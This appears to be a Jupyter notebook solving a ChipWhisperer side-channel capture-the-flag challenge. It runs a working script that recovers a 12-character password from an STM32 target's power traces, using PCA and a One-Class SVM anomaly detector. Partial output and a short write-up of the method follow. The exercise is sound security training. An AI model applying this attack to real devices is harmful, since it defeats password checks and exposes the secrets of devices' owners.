# Dark Gatekeeper

In [11]:
SCOPETYPE = 'CWNANO'
PLATFORM = 'CWNANO'

In [12]:
%run "../setup/Setup_Generic.ipynb"

(ChipWhisperer NAEUSB WARNING|File naeusb.py:826) Your firmware (0.65.0) is outdated - latest is 0.66.0 See https://chipwhisperer.readthedocs.io/en/latest/firmware.html for more information


INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.
INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.
INFO: Found ChipWhisperer😍


In [13]:
cw.program_target(scope, prog, "darkGatekeeper-{}.hex".format(PLATFORM))

Detected known STMF32: STM32F04xxx
Extended erase (0x44), this can take ten seconds or more
Attempting to program 5603 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 5603 bytes


In [15]:
import time
from string import printable
import random

import chipwhisperer as cw
import numpy as np

from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.svm import OneClassSVM

# -----------------------
# Config
# -----------------------
CHARSET = printable[:-6]   
PASSWORD_LENGTH = 12   

# Background model hyperparams
N_BG = 40          # how many "likely-wrong" traces to model the background
N_PCS = 40         # PCA components
NU = 0.05          # OneClassSVM nu (fraction of expected outliers). 0.05-0.1 works well.

# Optional: subsample to reduce dimensionality/time (e.g., keep every k-th point)
SUBSAMPLE_STEP = 1  

# -----------------------
# ChipWhisperer setup
# -----------------------
scope = cw.scope()
target = cw.target(scope, cw.targets.SimpleSerial)
scope.default_setup()

def reset_target():
    scope.io.nrst = 'low'
    time.sleep(0.05)
    scope.io.nrst = 'high_z'
    time.sleep(0.05)

def authenticate(key: bytes):
    scope.arm()
    target.simpleserial_write('a', key)

    timeout = scope.capture()
    if timeout:
        raise RuntimeError("Capture timed out.")

    response = target.simpleserial_read('r', 18)  # not used for learning here
    trace = scope.get_last_trace().copy()
    return response, trace

# -----------------------
# ML helpers
# -----------------------
class BackgroundModel:
    """Fits an unsupervised 'normal (wrong guess)' model on traces."""
    def __init__(self, n_pcs=N_PCS, nu=NU, subsample_step=SUBSAMPLE_STEP):
        self.scaler = StandardScaler(with_mean=True, with_std=True)
        self.pca = PCA(n_components=n_pcs, svd_solver="full", whiten=False, random_state=0)
        self.ocsvm = OneClassSVM(kernel="rbf", gamma="scale", nu=nu)
        self.subsample_step = subsample_step
        self.fitted = False

    def _prep(self, X):
        X = np.asarray(X)
        if self.subsample_step > 1:
            X = X[:, ::self.subsample_step]
        return X

    def fit(self, traces):
        X = self._prep(np.vstack(traces))
        Xs = self.scaler.fit_transform(X)
        Xp = self.pca.fit_transform(Xs)
        self.ocsvm.fit(Xp)
        self.fitted = True

    def score(self, trace):
        """More negative => more anomalous."""
        assert self.fitted, "Model not fitted"
        x = self._prep(trace[np.newaxis, :])
        xs = self.scaler.transform(x)
        xp = self.pca.transform(xs)
        # decision_function: positive ~ inlier, negative ~ outlier (anomaly)
        return float(self.ocsvm.decision_function(xp)[0])

def collect_background_traces(prefix: bytes, padlen: int, n_bg: int, avoid_char: bytes = None):
    """
    Collect traces for random characters at current position, which are
    almost surely wrong. If we accidentally hit the right one, OC-SVM nu handles it.
    """
    traces = []
    tried = set()
    while len(traces) < n_bg:
        ch = random.choice(CHARSET)
        if ch in tried:
            continue
        tried.add(ch)
        if avoid_char is not None and ch.encode() == avoid_char:
            continue

        key = prefix + ch.encode() + (padlen - 1) * b" "
        _, tr = authenticate(key)
        traces.append(tr)
    return traces

def pick_char_with_ml(prefix: bytes, padlen: int, bg_model: BackgroundModel):
    """
    Score all candidates using anomaly score vs background model.
    Select the *most anomalous* (lowest decision_function score).
    """
    scores = []
    for ch in CHARSET:
        key = prefix + ch.encode() + (padlen - 1) * b" "
        _, tr = authenticate(key)
        s = bg_model.score(tr)
        scores.append((s, ch))
        print(f"Testing: {(prefix + ch.encode()).decode(errors='ignore'):<{PASSWORD_LENGTH}}  Score: {s:+.4f}")
    scores.sort(key=lambda t: t[0])  # ascending: most negative (most anomalous) first
    best_score, best_char = scores[0]
    return best_char.encode(), best_score

# -----------------------
# Attack
# -----------------------
def main():
    queries = 0

    # Optional: warm-up reference run to stabilize
    ref_key = PASSWORD_LENGTH * b" "
    _, _ = authenticate(ref_key)
    queries += 1

    password = b""

    for i in range(PASSWORD_LENGTH):
        padlen = PASSWORD_LENGTH - len(password)
        print(f"\n[Position {i}] Building background model from 'wrong' guesses...")

        # Collect background (likely-wrong) traces & fit model
        bg_traces = collect_background_traces(password, padlen, N_BG)
        queries += len(bg_traces)

        bg_model = BackgroundModel()
        bg_model.fit(bg_traces)

        # Score all candidates; choose most anomalous
        best_char, best_score = pick_char_with_ml(password, padlen, bg_model)
        queries += len(CHARSET)

        password += best_char
        print(f"=> Picked '{best_char.decode()}' at position {i} (anomaly score {best_score:+.4f})")
        # Optional: quick reset in case target state drifts
        # reset_target()

    final_key = password
    response, _ = authenticate(final_key)
    queries += 1

    print(f"\nGot response {response} for password: {password.decode(errors='ignore')}")
    print(f"Number of queries: {queries}")

if __name__ == "__main__":
    main()


(ChipWhisperer NAEUSB WARNING|File naeusb.py:826) Your firmware (0.65.0) is outdated - latest is 0.66.0 See https://chipwhisperer.readthedocs.io/en/latest/firmware.html for more information



[Position 0] Building background model from 'wrong' guesses...
Testing: 0             Score: +0.1786
Testing: 1             Score: +0.2144
Testing: 2             Score: +0.1792
Testing: 3             Score: +0.2260
Testing: 4             Score: +0.1701
Testing: 5             Score: +0.1608
Testing: 6             Score: +0.1838
Testing: 7             Score: -0.2968
Testing: 8             Score: +0.1570
Testing: 9             Score: +0.1927
Testing: a             Score: +0.1800
Testing: b             Score: +0.1842
Testing: c             Score: +0.1572
Testing: d             Score: +0.1152
Testing: e             Score: +0.1735
Testing: f             Score: +0.1963
Testing: g             Score: +0.2242
Testing: h             Score: +0.1758
Testing: i             Score: +0.1414
Testing: j             Score: +0.2155
Testing: k             Score: +0.0359
Testing: l             Score: +0.1906
Testing: m             Score: +0.2384
Testing: n             Score: +0.2097
Testing: o             S

turned the side-channel search into an unsupervised anomaly-detection problem. For each password position, I first collected a batch of traces from random (almost certainly wrong) guesses and used them to learn what “normal = wrong guess” looks like: standardize the traces, reduce dimensionality with PCA, then fit a One-Class SVM on the resulting components. With that background model in place, I tested every candidate character and scored its trace with the SVM’s decision function—more negative means “more anomalous” relative to the wrong-guess distribution. The character whose trace was most anomalous was chosen as the correct one, then the process repeated for the next position. This replaces a brittle single correlation threshold with a noise-tolerant, data-driven detector.